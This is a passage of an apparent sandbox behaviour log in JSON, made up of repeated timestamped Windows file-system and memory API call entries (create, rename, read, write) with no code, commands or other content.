"timestamp": "2016-02-16 17:41:41,582", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,592", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,592", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,602", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,602", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,612", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,612", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,622", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,622", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,632", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,632", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,642", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,642", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,652", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,652", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,662", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,662", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,672", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,672", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,682", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,682", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,692", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,692", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,702", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,702", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,712", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,712", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,722", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,722", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,732", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,732", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,742", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,742", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,752", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,752", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,762", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,762", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,772", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,772", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,782", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,782", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,792", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,792", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,802", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,802", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,812", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,812", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,822", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,822", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,832", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,832", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,842", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,842", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,852", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,852", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,862", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,862", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,872", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,872", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,882", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,882", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,892", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,892", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,902", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,902", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,912", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,912", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,912", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,922", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 